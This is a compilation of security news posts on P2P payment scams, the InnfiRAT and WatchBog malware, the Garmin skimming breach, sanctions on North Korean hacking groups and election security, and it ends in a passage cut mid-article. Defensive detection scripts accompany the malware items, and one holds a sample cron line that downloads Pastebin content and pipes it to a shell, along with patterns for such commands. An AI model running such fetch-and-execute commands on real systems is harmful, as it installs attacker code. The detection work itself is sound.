P2P technology allows you to create a profile on a transfer app and link your bank account or credit card to it. Once your banking information is set up, you can locate another person’s account on the app (or invite someone to the app) and transfer funds instantly into their P2P account (without the hassle of getting a bank account number, email, or phone number). That person can leave the money in their app account, move it into his or her bank account, or use a debit card issued by the P2P app to use the funds immediately. If the app offers a credit card (like Venmo does), the recipient can use the Venmo card like a credit card at retailers most anywhere. 

Some of the more popular P2P apps include Venmo, Cash App, Zelle, Apple Pay, Google Wallet, PayPal.me, Facebook Messenger, and Snapcash, among others. Because of the P2P platform’s rapid growth, more and more investors are entering the market each day to introduce new cash apps, which is causing many analysts to speculate on the need for paper check transactions in the future.

Are they safe?

While sending your hard-earned money back and forth through cyberspace on an app doesn’t sound safe, in general, it is. Are there some exceptions? Always. 

Online scam trends often follow consumer purchasing trends and, right now, the hot transaction spot is P2P platforms. Because P2P money is transferred instantly (and irreversibly), scammers exploit this and are figuring out how to take people’s money. After getting a P2P payment, scammers then delete their accounts and disappear instantly.

In 2018 Consumer Reports (CR) compared the potential financial and privacy risks of five mobile P2P services with a focus on payment authentication and data privacy. CR found all the apps had acceptable encryption but some were dinged for not clearly explaining how they protected user data. The consumer advocacy group ranked app safety strength in this order: Apple Pay, Venmo, Cash App, Facebook Messenger, and Zelle. CR also noted they “found nothing to suggest that using these products would threaten the security of your financial and personal data.”

While any app’s architecture may be deemed safe, no app user is immune from scams, which is where safe habits around the app make all the difference. If your family uses P2P apps regularly, confirm each user understands the potential risks. Here are just a few of the schemes that have been connected to P2P apps.

Potential scams

Fraudulent sellers. This scam targets an unassuming buyer who sends money through a P2P app to purchase an item from someone they met online. The friendly seller casually suggests the buyer “just Venmo or Cash App me.” The buyer sends the money, but the item is never received, and the seller vanishes. This scam has been known to happen in online marketplaces and other trading sites and apps.

Malicious emails. Another scam is sending people an email telling them that someone has deposited money in their P2P account. They are prompted to click a link to go directly to the app, but instead, the malicious link downloads malware onto the person’s phone or computer. The scammer can then glean personal information from the person’s devices. To avoid a malware attack, consider installing comprehensive security software on your family’s computers and devices.

Ticket scams. Beware of anyone selling concert or sporting event tickets online. Buyers can get caught up in the excitement of scoring tickets for their favorite events, send the money via a P2P app, but the seller leaves them empty-handed.

Puppy and romance scams. In this cruel scam, a pet lover falls in love with a photo of a puppy online, uses a P2P app to pay for it, and the seller deletes his or her account and disappears. Likewise, catfish scammers gain someone’s trust. As the romantic relationship grows, the fraudulent person eventually asks to borrow money. The victim sends money using a P2P app only to have their love interest end all communication and vanish.  

P2P safety: Talking points for families

Only connect with family and friends. When using cash apps, only exchange money with people you know. Unlike an insured bank, P2P apps do not refund the money you’ve paid out accidentally or in a scam scenario. P2P apps hold users 100% responsible for transfers. 

Verify details of each transfer. The sender is responsible for funds, even in the case of an accidental transfer. So, if you are paying Joe Smith your half of the rent, be sure you select the correct Joe Smith (not Joe Smith_1 or Joe Smithe) before you hit send. There could be dozens of name variations to choose from in an app’s directory. Also, verify with your bank that each P2P transaction registers.

Avoid public Wi-Fi transfers. Public Wi-Fi is susceptible to hackers trying to access valuable financial and personal information. For this reason, only use a secure, private Wi-Fi network when using a P2P payment app. If you must use public Wi-Fi, consider using a Virtual Private Network (VPN).

Don’t use P2P apps for business. P2P apps are designed to be used between friends and include no-commercial-use clauses in their policies. For larger business transactions such as buying and selling goods or services use apps like PayPal. 

Lock your app. When you have a P2P app on your phone, it’s like carrying cash. If someone steals your phone, they can go into an unlocked P2P app and send themselves money from your bank account. Set up extra security on your app. Most apps offer PINs, fingerprint IDs, and two-factor authentication. Also, always lock your device home screen.

Adjust privacy settings. Venmo includes a feed that auto-shares when users exchange funds, much like a social media feed. To avoid a stranger seeing that you paid a friend for Ed Sheeran tickets (and won’t be home that night), be sure to adjust your privacy settings.

Read disclosures. One way to assess an app’s safety is to read its disclosures. How does the app protect your privacy and security? How does the app use your data? What is the app’s error-resolution policy? Feel secure with the app you choose.

We’ve learned that the most significant factor in determining an app’s safety comes back to the person using it. If your family loves using P2P apps, be sure to take the time to discuss the responsibility that comes with exchanging cash through apps. 

The post Are Cash Transfer Apps Safe to Use? Here’s What Your Family Needs to Know appeared first on McAfee Blogs.

InnfiRAT Trojan steals funds from Bitcoin and Litecoin wallets

Researchers at Zscaler have spotted a new malware dubbed InnfiRAT that infects victims’ systems to steal cryptocurrency wallet data. 

Researchers at Zscaler have discovered a new Trojan dubbed InnfiRAT that implements many standard Trojan capabilities along with the ability to steal cryptocurrency wallet data. 

“As with just about every piece of malware, InnfiRAT is designed to access and steal personal information on a user’s computer.” states a blog post published by Zscaler. “Among other things, InnfiRAT is written to look for cryptocurrency wallet information, such as Bitcoin and Litecoin. InnfiRAT also grabs browser cookies to steal stored usernames and passwords, as well as session data.”

Upon execution, the malware first checks whether it is running from the %AppData% directory under the name NvidiaDriver.exe. The malware then checks for network connectivity by making a request to “iplogger[.]com/1HEt47,” and records all the running processes in an array to check whether any of them is running with the name NvidiaDriver.exe. If it finds a process running with this name, it kills that process and waits for it to exit.

The malicious code will make a copy of itself in the AppData directory before writing a Base64 encoded PE file in memory to execute the main component of the Trojan. 

As the execution of the malware starts, it checks for the presence of a virtualized environment that could be used by researchers to analyze the threat. If the malware is not running in a sandbox, it will contact the command-and-control (C2) server, transfer the information stolen from the machine, and await further commands.

The InnfiRAT Trojan can also deploy additional payloads to steal files, capture browser cookies to harvest stored credentials for various online services and grab open sessions. The malware is also able to shut down traditional antivirus processes.

InnfiRAT scans the machine for files associated with Bitcoin (BTC) and Litecoin (LTC) wallets (Litecoin: %AppData%\Litecoin\wallet.dat, Bitcoin: %AppData%\Bitcoin\wallet.dat). If they are present, the malicious code siphons the existing data in an attempt to steal the victims’ funds.
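A defender-side correlation check for the behaviours described above, added here as an example (it is not Zscaler’s code): it groups constructed Sysmon-style process, network and file events by pid and flags a process that combines an NvidiaDriver.exe image under %AppData%, the iplogger.com connectivity check, and a read of the wallet.dat paths by something other than a wallet client. The event field names, the wallet-client allowlist and the expansion of %AppData% to AppData\Roaming are assumptions of the example.

```python
"""Correlate host events for the InnfiRAT behaviours described above.

Added example, not Zscaler's code. Event records are constructed,
Sysmon-like dicts; the field names are an assumption for this example.
"""
import re

# Indicators taken from the write-up. %AppData% is assumed to expand to
# <profile>\AppData\Roaming, the usual Windows default.
SUSPECT_IMAGE = re.compile(r"\\AppData\\Roaming\\NvidiaDriver\.exe$", re.IGNORECASE)
C2_CHECK_HOST = "iplogger.com"
WALLET_FILES = re.compile(r"\\AppData\\Roaming\\(Bitcoin|Litecoin)\\wallet\.dat$", re.IGNORECASE)
# Programs that legitimately open wallet.dat (constructed allowlist).
WALLET_CLIENTS = {"bitcoin-qt.exe", "bitcoind.exe", "litecoin-qt.exe", "litecoind.exe"}


def correlate(events):
    """Return {pid: [stage, ...]} for every pid that matched at least one stage."""
    findings = {}
    image_by_pid = {}
    for ev in events:
        pid = ev["pid"]
        if ev["type"] == "process_create":
            image_by_pid[pid] = ev["image"]
            if SUSPECT_IMAGE.search(ev["image"]):
                findings.setdefault(pid, []).append("nvidiadriver_in_appdata")
        elif ev["type"] == "network_connect":
            if ev["dest"].lower() == C2_CHECK_HOST:
                findings.setdefault(pid, []).append("iplogger_connectivity_check")
        elif ev["type"] == "file_read":
            if WALLET_FILES.search(ev["path"]):
                # The last path component of the image is the executable name.
                exe = image_by_pid.get(pid, "").rsplit("\\", 1)[-1].lower()
                if exe not in WALLET_CLIENTS:
                    findings.setdefault(pid, []).append("wallet_read_by_non_wallet_process")
    return findings


def alerts(events, min_stages=2):
    """Raise only on pids that hit at least min_stages distinct stages;
    a lone browser connection to iplogger.com is not enough on its own."""
    return {pid: sorted(set(stages))
            for pid, stages in correlate(events).items()
            if len(set(stages)) >= min_stages}


# Constructed sample telemetry: one infected-looking process (pid 4242),
# a real wallet client (1001) and a browser that merely visited iplogger.com (2002).
SAMPLE_EVENTS = [
    {"type": "process_create", "pid": 4242, "image": r"C:\Users\alice\AppData\Roaming\NvidiaDriver.exe"},
    {"type": "network_connect", "pid": 4242, "dest": "iplogger.com"},
    {"type": "file_read", "pid": 4242, "path": r"C:\Users\alice\AppData\Roaming\Bitcoin\wallet.dat"},
    {"type": "process_create", "pid": 1001, "image": r"C:\Program Files\Bitcoin\bitcoin-qt.exe"},
    {"type": "file_read", "pid": 1001, "path": r"C:\Users\alice\AppData\Roaming\Bitcoin\wallet.dat"},
    {"type": "process_create", "pid": 2002, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe"},
    {"type": "network_connect", "pid": 2002, "dest": "iplogger.com"},
]

if __name__ == "__main__":
    for pid, stages in alerts(SAMPLE_EVENTS).items():
        print(f"pid {pid}: {', '.join(stages)}")
```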

“Because RATs are usually downloaded as a result of a user opening an email attachment or downloading an application that has been infected, the first line of defense is often the users who must, as always, refrain from downloading programs or opening attachments that aren’t from a trusted source.” conclude the researchers.

Pierluigi Paganini

(SecurityAffairs – InnfiRAT, hacking)

The post InnfiRAT Trojan steals funds from Bitcoin and Litecoin wallets appeared first on Security Affairs.

Hackers stole payment data from Garmin South Africa shopping portal

Garmin, the multinational company focused on GPS technology for automotive, aviation, marine, outdoor, and sport activities is victim of a data breach.

Garmin is the victim of a data breach: it is warning customers in South Africa who shopped on the shop.garmin.co.za portal that their personal info and payment data were exposed.

The stolen data included customers’ home addresses, phone numbers, emails, and credit card information that could be used to make purchases (i.e. card number, expiration date and CVV code of the payment card).

“We recently discovered theft of customer data from orders placed through shop.garmin.co.za (operated by Garmin South Africa) that compromised your personal data related to an order that you placed through the website,” said Jennifer Van Niekerk, South Africa Managing Director.

“The compromised data was limited to only Garmin’s South Africa site, and contained payment information, including the number, expiration date and CVV code for your payment card, along with your first and last name, physical address, phone number and email address.”

Garmin SA recommends that customers review and monitor all their payment card records for any purchases; it seems that the company is not offering impacted customers any fraud protection service.

Impacted customers have to contact their bank or payment card provider.

The breached shopping portal was using the popular Magento ecommerce platform; it was shut down after the security breach was discovered.

The Register contacted Garmin South Africa for more information on the incident; the company confirmed that the attackers used a software skimmer to siphon customers’ payment details.

Garmin explained that the e-commerce site “was operated by a third party on behalf of Garmin South Africa.”

“Promptly after learning of this incident, we immediately shut down the impacted system, began an investigation, and contacted the South African Information Regulator.” Garmin told El Reg.

“While Garmin does not store credit card information, the unauthorized party leveraged virtual skimming technology to capture customer details at the time of input, including credit card information.” It added that the incident was isolated to a few thousand customers who accessed the SA portal: “This incident affected less than 6,700 customers in South Africa and does not affect customers who purchased from other Garmin websites in other regions.”

Most attacks of this kind have been carried out by the umbrella of hacking crews tracked as Magecart, but at the time of writing no security firm had demonstrated their involvement in this incident.

Pierluigi Paganini

(SecurityAffairs – data breach, hacking)

The post Hackers stole payment data from Garmin South Africa shopping portal appeared first on Security Affairs.

The US Treasury placed sanctions on North Korea linked APT Groups

The US Treasury placed sanctions on three North Korea-linked hacking groups, the Lazarus Group, Bluenoroff, and Andariel.

The US Treasury has placed sanctions on three North Korea-linked hacking groups: the Lazarus Group, Bluenoroff, and Andariel.

The groups are behind several hacking operations that resulted in the theft of hundreds of millions of dollars from financial institutions and cryptocurrency exchanges worldwide, as well as destructive cyber-attacks on infrastructure. Lazarus Group is also considered the threat actor behind the massive 2018 WannaCry attack.

According to the Treasury, the three groups “likely” stole $571 million in cryptocurrency from five Asian exchanges in 2017 and 2018.

Intelligence analysts believe the groups are under the control of the Reconnaissance General Bureau, which is North Korea’s primary intelligence bureau.

“Treasury is taking action against North Korean hacking groups that have been perpetrating cyber attacks to support illicit weapon and missile programs,” said Sigal Mandelker, Treasury Under Secretary for Terrorism and Financial Intelligence.

“We will continue to enforce existing US and UN sanctions against North Korea and work with the international community to improve cybersecurity of financial networks.”

The activity of the Lazarus Group surged in 2014 and 2015; its members used mostly custom-tailored malware in their attacks, and experts who investigated the crew consider it highly sophisticated.

This threat actor has been active since at least 2009, possibly as early as 2007, and it was involved in both cyber espionage campaigns and sabotage activities aimed at destroying data and disrupting systems.

The group is considered responsible for the massive WannaCry ransomware attack, a string of SWIFT attacks in 2016, and the Sony Pictures hack.

Bluenoroff is considered a sub-group of the Lazarus APT that was formed by the North Korean government to earn revenue from hacking campaigns in response to increased global sanctions.  

“According to industry and press reporting, by 2018, Bluenoroff had attempted to steal over $1.1 billion dollars from financial institutions and, according to press reports, had successfully carried out such operations against banks in Bangladesh, India, Mexico, Pakistan, Philippines, South Korea, Taiwan, Turkey, Chile, and Vietnam.” continues the US Treasury.

Andariel is another Lazarus subgroup that focuses on targeting businesses, government agencies, and individuals. It conducted multiple attacks aimed at stealing bank card information and at ATMs.

Andariel carried out cyber attacks against online gambling and poker sites.

The sanctions placed by the US Treasury aim to block the groups’ access to the global financial system and to freeze any assets held under US jurisdiction.

“As a result of today’s action, all property and interests in property of these entities, and of any entities that are owned, directly or indirectly, 50 percent or more by the designated entities, that are in the United States or in the possession or control of U.S. persons are blocked and must be reported to OFAC.” states the US Treasury. “OFAC’s regulations generally prohibit all dealings by U.S. persons or within (or transiting) the United States that involve any property or interests in property of blocked or designated persons.”

Pierluigi Paganini

(SecurityAffairs – North Korea, hacking)

The post The US Treasury placed sanctions on North Korea linked APT Groups appeared first on Security Affairs.

Symantec Axes Hundreds of US Jobs

American software giant Symantec is cutting hundreds of jobs at four different sites across the US as part of a $100 million restructuring program.

Government filings of notices made by the company in August under the Worker Adjustment and Retraining Notification (WARN) Act indicate that the roles of 230 Symantec employees will be terminated on October 15, 2019.  

The company's Californian headquarters at Mountain View will bear the brunt of the losses, with 152 job cuts expected. In San Francisco 18 jobs will go, and a further 24 will be axed from the company's site in Springfield, Oregon. In Culver City, Los Angeles County, 36 positions will be scrapped. Employees were notified in early August. 

The cuts will affect many different job classifications but most of the roles targeted were primarily related to tech work. According to the Employment Development Department (EDD) filings made by Symantec in California, many software engineer and software development engineer jobs are to go along with a raft of middle-management positions.

In a letter which accompanied the filings, Symantec wrote: “Layoffs are expected to be permanent," before stating, "None of the affected employees are represented by a union, and no bumping rights exist."

Symantec, which supplies 50 million people with Norton antivirus software and LifeLock identity theft protection, has over 11,000 employees globally. The US job cuts are part of a planned 7% reduction in Symantec's international workforce announced last month alongside news of the company's $10.7 billion sale of its enterprise division to San Jose chipmaker Broadcom.

News of the cuts comes amid rumors that Symantec has received interest from two private-equity suitors who, according to the Wall Street Journal, are seeking to buy the cybersecurity firm for more than $16 billion.

The Journal reported that "Permira and Advent International Corp. recently approached Symantec proposing a takeover deal valuing Symantec at $26 to $27 a share that would hand them the company’s consumer operation while preserving the sale of its enterprise business to Broadcom Inc." 

With the sale of its enterprise arm to Broadcom pending, it's not clear how the proposed deal would work if it was to go ahead.

WatchBog cryptomining botnet now uses Pastebin for C2

A new cryptocurrency-mining botnet tracked as WatchBog is heavily using the Pastebin service for command and control (C&C) operations.

Cisco Talos researchers discovered that a new cryptocurrency-mining botnet tracked as WatchBog is heavily using the Pastebin service for command and control.

The WatchBog bot is a Linux-based malware that has been active since last year; it targets systems to mine the Monero virtual currency.

“Cisco Incident Response (CSIRS) recently responded to an incident involving the Watchbog cryptomining botnet. The attackers were able to exploit CVE-2018-1000861 to gain a foothold and install the Watchbog malware on the affected systems.” states the analysis published by Cisco Talos.

“This Linux-based malware relied heavily on Pastebin for command and control (C2) and operated openly. CSIRS gained an accurate understanding of the attacker’s intentions and abilities on a customer’s network by analyzing the various Pastebins.”

Recently, Intezer researchers spotted a strain of the Linux miner that also scans the Internet for Windows RDP servers vulnerable to BlueKeep.

The new WatchBog variant includes a new spreader module along with exploits for the following recently patched vulnerabilities in Linux applications:

The malware also includes scanners for Jira and Solr flaws, along with a brute-forcing module for CouchDB and Redis installs.

The operators behind the WatchBog botnet claim to be able to identify vulnerabilities in enterprise systems “before any ‘real’ hackers could do so,” and offer their protection services. However, every time the operators identify vulnerable hosts, the systems are recruited into the crypto-mining botnet.

“During the investigation, Cisco IR found signs of hosts becoming a part of a separate botnet around the time of the Watchbog activity. This raises serious doubts about the “positive” intentions of this adversary.” continues Talos.

During the installation phase, the bot checks for running processes associated with other cryptocurrency miners, then it will use a script to terminate them.

It then determines whether it can write to various directories, checks the system architecture, and makes three attempts to download and install a ‘kerberods’ dropper using wget or curl.

The installation script also retrieves the contents of a Pastebin URL containing a Monero wallet ID and mining information, then downloads the miner. The script also checks whether the ‘watchbog’ process is running; if it is not found, the ‘testa’ or ‘download’ functions are called to install the version of the miner that matches the target architecture.

The ‘testa’ function, used to facilitate the infection process, is responsible for writing the various configuration data used by the miner.

The script downloads encoded Pastebin content into a text file and gives it execution permissions. The script finally starts the Watchbog process and deletes the text file.

The ‘download’ function performs similar operations by writing the contents retrieved from various file locations; once the target architecture is determined, it installs the appropriate miner.

WatchBog uses SSH for lateral movement; a specific script also checks for SSH keys on the compromised system in an attempt to use them against other systems.

Talos researchers also noticed that threat actors leverage a Python script that scans for open Jenkins and Redis ports on the host’s subnet for lateral movement. Attackers also rely on cron jobs to achieve persistence and attempt to cover their tracks by erasing or overwriting files and logs.
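A cron-persistence hunt for the pattern described above (a cron entry that pulls content from Pastebin with curl or wget and hands it to a shell, or one that launches a ‘watchbog’ or ‘kerberods’ binary), added here as an example and not Talos code. The crontab text is constructed; the parser covers user-crontab syntax only, and the assumption that the extra user field of /etc/crontab and /etc/cron.d is absent is one to adjust when scanning system crontabs.

```python
"""Hunt crontab entries for WatchBog-style persistence: a Pastebin fetch
piped to a shell, or a known WatchBog binary name.

Added example, not Cisco Talos code. The sample crontab is constructed.
Feed it the output of `crontab -l` or the contents of a user crontab file.
"""
import re

SPECIAL_SCHEDULES = {"@reboot", "@yearly", "@annually", "@monthly",
                     "@weekly", "@daily", "@midnight", "@hourly"}
FETCH = re.compile(r"\b(curl|wget)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(ba|da)?sh\b")      # "| sh", "| bash", ...
PASTEBIN = re.compile(r"pastebin\.com", re.IGNORECASE)
KNOWN_NAMES = re.compile(r"\b(watchbog|kerberods)\b", re.IGNORECASE)
ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")


def split_entry(line):
    """Return (schedule, command) for a crontab entry, or None for blank
    lines, comments and VAR=value environment lines (user-crontab syntax;
    the user field of /etc/crontab is not handled here)."""
    s = line.strip()
    if not s or s.startswith("#") or ENV_LINE.match(s):
        return None
    if s.split(None, 1)[0] in SPECIAL_SCHEDULES:
        parts = s.split(None, 1)
        return parts[0], (parts[1] if len(parts) > 1 else "")
    parts = s.split(None, 5)            # five schedule fields, then the command
    if len(parts) < 6:
        return None
    return " ".join(parts[:5]), parts[5]


def assess(command):
    """Reasons a command looks like the WatchBog loader; empty if benign."""
    reasons = []
    if PASTEBIN.search(command):
        reasons.append("pastebin_url")
    if FETCH.search(command) and PIPE_TO_SHELL.search(command):
        reasons.append("fetch_piped_to_shell")
    if KNOWN_NAMES.search(command):
        reasons.append("known_watchbog_name")
    return reasons


def hunt(crontab_text):
    """Return one finding per suspicious entry, with its 1-based line number."""
    findings = []
    for lineno, line in enumerate(crontab_text.splitlines(), 1):
        entry = split_entry(line)
        if entry is None:
            continue
        schedule, command = entry
        reasons = assess(command)
        if reasons:
            findings.append({"line": lineno, "schedule": schedule,
                             "command": command, "reasons": reasons})
    return findings


# Constructed sample: two benign lines, one Pastebin loader, one @reboot launcher.
# The Pastebin path is a placeholder, not a real paste.
SAMPLE_CRONTAB = """\
# constructed sample crontab for the example
SHELL=/bin/sh
PATH=/usr/bin:/bin
0 3 * * * /usr/bin/certbot renew --quiet
*/10 * * * * (curl -fsSL https://pastebin.com/raw/PLACEHOLDER || wget -q -O- https://pastebin.com/raw/PLACEHOLDER) | sh > /dev/null 2>&1
@reboot /tmp/.X11-unix/watchbog
"""

if __name__ == "__main__":
    for f in hunt(SAMPLE_CRONTAB):
        print(f"line {f['line']} [{f['schedule']}]: {', '.join(f['reasons'])}")
```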

“Unpatched web applications vulnerable to known CVEs are a major target for attackers. Adversaries can leverage the vulnerability to gain a foothold into the web server and network environment in which the web server is deployed,” concludes the report. “The best way to prevent such activity would be to ensure that all enterprise web applications are up to date,” Talos notes.

Pierluigi Paganini

(SecurityAffairs – WatchBog, malware)

The post WatchBog cryptomining botnet now uses Pastebin for C2 appeared first on Security Affairs.

Cybersecurity Firm Employees Charged with Burglary of Courthouse Client

Two employees of a Colorado cybersecurity firm hired to test the security of an Iowa courthouse have been charged with burglary after allegedly breaking into the building.  

Gary Edward Demercurio, 43, of Seattle, Wash., and Justin Lawson Wynn, 29, of Naples, Fla., were arrested at approximately 1 a.m. on Wednesday morning after being found inside the Dallas County Courthouse in possession of burglary tools. 

Dallas County deputy sheriffs arrived at the scene after an alarm at the courthouse at 908 Court Street in Adel was tripped.

Demercurio and Wynn, who both work for global cybersecurity firm Coalfire, have been charged with third-degree burglary and possession of burglary tools. 

At the time of their arrest, Demercurio and Wynn told Dallas County deputy sheriffs that "they were contracted to break into the building for Iowa courts to check the security of the building."

In a press release issued later that day, Iowa Judicial Branch confirmed that while the state court administration had hired cybersecurity firm Coalfire to carry out security testing, the midnight shenanigans allegedly committed by Wynn and Demercurio were not exactly what it had in mind. 

While the administration had asked Coalfire to test vulnerabilities in the state’s electronic records system, it "did not intend, or anticipate, those efforts to include the forced entry into a building."

"It’s a strange case," said Dallas County Sheriff Chad Leonard on Wednesday. "We’re still investigating this thing."

When contacted for comment, Coalfire replied with the following statement: "Coalfire is a global cybersecurity firm that has conducted over 10,000 security assessments since 2001. We have performed hundreds of assessments for similar government agencies, and our employees work diligently to ensure our engagements are conducted with utmost integrity and in alignment with the objectives of our client. 

"However, we cannot comment on this situation or any specific client engagements due to the confidential nature of our work and various security and privacy laws. Additionally, we cannot comment on this specific case as it is an active legal matter." 

Demercurio was released from Dallas County Jail after posting a $57,000 bond. Wynn was likewise released after posting a bond of $50,000. Both men are scheduled to appear before Dallas County District Court for a preliminary hearing on September 23.

When Biology Becomes Software

All of life is based on the coordinated action of genetic parts (genes and their controlling sequences) found in the genomes (the complete DNA sequence) of organisms.

Genes and genomes are based on code -- just like the digital language of computers. But instead of zeros and ones, four DNA letters -- A, C, T, G -- encode all of life. (Life is messy, and there are actually all sorts of edge cases, but ignore that for now.) If you have the sequence that encodes an organism, in theory, you could recreate it. If you can write new working code, you can alter an existing organism or create a novel one.

If this sounds to you a lot like software coding, you're right. As synthetic biology looks more like computer technology, the risks of the latter become the risks of the former. Code is code, but because we're dealing with molecules -- and sometimes actual forms of life -- the risks can be much greater.

Imagine a biological engineer trying to increase the expression of a gene that maintains normal gene function in blood cells. Even though it's a relatively simple operation by today's standards, it'll almost certainly take multiple tries to get it right. Were this computer code, the only damage those failed tries would do is to crash the computer they're running on. With a biological system, the code could instead increase the likelihood of multiple types of leukemias and wipe out cells important to the patient's immune system.

We have known the mechanics of DNA for some 60 plus years. The field of modern biotechnology began in 1972 when Paul Berg joined one virus gene to another and produced the first "recombinant" virus. Synthetic biology arose in the early 2000s when biologists adopted the mindset of engineers; instead of moving single genes around, they designed complex genetic circuits.

In 2010 Craig Venter and his colleagues recreated the genome of a simple bacterium. More recently, researchers at the Medical Research Council Laboratory of Molecular Biology in Britain created a new, more streamlined version of E. coli. In both cases the researchers created what could arguably be called new forms of life.

This is the new bioengineering, and it will only get more powerful. Today you can write DNA code in the same way a computer programmer writes computer code. Then you can use a DNA synthesizer or order DNA from a commercial vendor, and then use precision editing tools such as CRISPR to "run" it in an already existing organism, from a virus to a wheat plant to a person.

In the future, it may be possible to build an entire complex organism such as a dog or cat, or recreate an extinct mammoth (currently underway). Today, biotech companies are developing new gene therapies, and international consortia are addressing the feasibility and ethics of making changes to human genomes that could be passed down to succeeding generations.

Within the biological science community, urgent conversations are occurring about "cyberbiosecurity," an admittedly contested term which exists between biological and information systems where vulnerabilities in one can affect the other. These can include the security of DNA databanks, the fidelity of transmission of those data, and information hazards associated with specific DNA sequences that could encode novel pathogens for which no cures exist.

These risks have occupied not only learned bodies -- the National Academies of Sciences, Engineering, and Medicine published at least a half dozen reports on biosecurity risks and how to address them proactively -- but have made it to mainstream media: genome editing was a major plot element in Netflix's Season 3 of "Designated Survivor."

Our worries are more prosaic. As synthetic biology "programming" reaches the complexity of traditional computer programming, the risks of computer systems will transfer to biological systems. The difference is that biological systems have the potential to cause much greater, and far more lasting, damage than computer systems.

Programmers write software through trial and error. Because computer systems are so complex and there is no real theory of software, programmers repeatedly test the code they write until it works properly. This makes sense, because both the cost of getting it wrong and the ease of trying again is so low. There are even jokes about this: a programmer would diagnose a car crash by putting another car in the same situation and seeing if it happens again.

Even finished code still has problems. Again due to the complexity of modern software systems, "works properly" doesn't mean that it's perfectly correct. Modern software is full of bugs -- thousands of software flaws -- that occasionally affect performance or security. That's why any piece of software you use is regularly updated; the developers are still fixing bugs, even after the software is released.

Bioengineering will be largely the same: writing biological code will have these same reliability properties. Unfortunately, the software solution of making lots of mistakes and fixing them as you go doesn't work in biology.

In nature, a similar type of trial and error is handled by "the survival of the fittest" and occurs slowly over many generations. But human-generated code from scratch doesn't have that kind of correction mechanism. Inadvertent or intentional release of these newly coded "programs" may result in pathogens of expanded host range (just think swine flu) or organisms that wreck delicate ecological balances.

Unlike computer software, there's no way so far to "patch" biological systems once released to the wild, although researchers are trying to develop one. Nor are there ways to "patch" the humans (or animals or crops) susceptible to such agents. Stringent biocontainment helps, but no containment system provides zero risk.

Opportunities for mischief and malfeasance often occur when expertise is siloed, fields intersect only at the margins, and when the gathered knowledge of small, expert groups doesn't make its way into the larger body of practitioners who have important contributions to make.

Good starts have been made by biologists, security agencies, and governance experts. But these efforts have tended to be siloed, in either the biological and digital spheres of influence, classified and solely within the military, or exchanged only among a very small set of investigators.

What we need is more opportunities for integration between the two disciplines. We need to share information and experiences, classified and unclassified. We have tools among our digital and biological communities to identify and mitigate biological risks, and those to write and deploy secure computer systems.

Those opportunities will not occur without effort or financial support. Let's find those resources, public, private, philanthropic, or any combination. And then let's use those resources to set up some novel opportunities for digital geeks and bionerds -- as well as ethicists and policymakers -- to share experiences, concerns, and come up with creative, constructive solutions to these problems that are more than just patches.

These are overarching problems; let's not let siloed thinking or funding get in the way of breaking down barriers between communities. And let's not let technology of any kind get in the way of the public good.

This essay previously appeared on CNN.com.

Week in security with Tony Anscombe

ESET researchers found an undocumented backdoor used by the infamous Stealth Falcon group, an operator of targeted spyware attacks against journalists, activists and dissidents in the Middle East. With the launch of the Safer Kids online initiative, a guide to help parents protect their kids when they take selfies. The discovery of a serious vulnerability

The post Week in security with Tony Anscombe appeared first on WeLiveSecurity

MSOE Opens Cyber-Learning Center Built with $34m Alumnus Donation

A Wisconsin university today celebrated the grand opening of a new cyber-learning facility funded by a $34m donation from a former student and his wife. 

Dwight Diercks graduated from the Milwaukee School of Engineering (MSOE) in 1990 with a degree in computer science and engineering. Now senior vice president of software engineering at California-based technology company NVIDIA, Diercks today serves as a regent of the university, which awarded him an honorary engineering doctorate in 2014.

A day-long program of events was held to mark the opening of the Dwight and Dian Diercks Computational Science Hall, which included a keynote address by Jensen Huang, founder, president, and CEO of NVIDIA.

According to the MSOE website, "Diercks Hall—and the courses taught within—position MSOE at the educational forefront in artificial intelligence (AI), deep learning, cyber security, robotics, cloud computing and other next-generation technologies."

The four-floor building features seven contemporary classrooms, nine innovative teaching laboratories, 25 offices for staff, and a 256-seat auditorium. At the heart of the hall is a state-of-the-art data center with an NVIDIA GPU-accelerated AI supercomputer, which is named Rosie after the women known as Rosies who programmed one of the earliest computers, the ENIAC. Rosie is also the name of Diercks' mother, who passed away in 2006.

On the building's third floor, the Caspian Cyber Security Laboratory will allow students to conduct real-world cybersecurity experiments and test defensive mechanisms in a professional and controlled environment. The room is grounded with special shielding paint and an electromagnetic field to prevent computer viruses that students are working on from spreading to the rest of campus through the wireless network.

The substantial donation given by Diercks and his wife, Dian, was bolstered with an additional $4m contributed by several individuals and corporations to support long-term operations and maintenance of the facility. 

Speaking at today's live-streamed opening ceremony, held in the new hall's atrium, the mayor of Milwaukee, Tom Barrett, quipped, "When I first heard the words artificial intelligence I thought someone had heard I had inflated my SAT scores," before declaring Friday, September 13, 2019, to be Dwight and Dian Diercks Day throughout the entire city of Milwaukee.

After Diercks and his wife cut a red ribbon with a giant pair of scissors to officially open the hall, he shared with the crowd his pleasure at learning that the addition of an external staircase to the building had increased the facility's final size to 65,536 square feet, the number of distinct values a 16-bit integer can represent.

Prediction: 2020 election is set to be hacked, if we don’t act fast

Since 1993, hackers have traveled to Las Vegas from around the world to demonstrate their skills at DefCon’s annual convention, and every year new horrors of cyber-insecurity are revealed as they wield their craft. Last year, for example, an eleven-year-old boy changed the election results on a replica of the Florida state election website in under ten minutes.

This year was no exception. Participants revealed all sorts of clever attacks and pathetic vulnerabilities. One hack allowed a convention attendee to commandeer control of an iPhone with a non-Apple-issue charging cord, one that is identical to the Apple version. Another group figured out how to use a Netflix account to steal banking information. But for our purposes, let’s focus on election security because without it democracy is imperiled. And if you think about it, what are the odds of something like DefCon being permitted in the People’s Republic of China?

Speaking of China (or Russia or North Korea or Iran or…) will the 2020 election be hacked?

In a word: Yes.

In 2016 Russia targeted elections systems in all 50 states.

A CNN article about DefCon’s now annual Voting Village, described the overall problem: Many election officials and key players in the election business are not sufficiently worried to anticipate, recognize and meet the challenges ahead.

While many organizations welcome the hijinks of DefCon participants — including the Pentagon — the voting machine manufacturers don’t generally seem eager to have hackers of any stripe show them where they are vulnerable… and that should worry you.

DefCon participants are instructed to break things, and they do just that. This year, Senator Ron Wyden (D-Ore.) toured DefCon’s Voting Village and he left with these words: “We need paper ballots, guys.”

Was the Senator right? It’s the easiest solution, but not the only one. Because election machines are thus far preeminently breakable, we still need audited paper trails.

Paper trails are mission critical

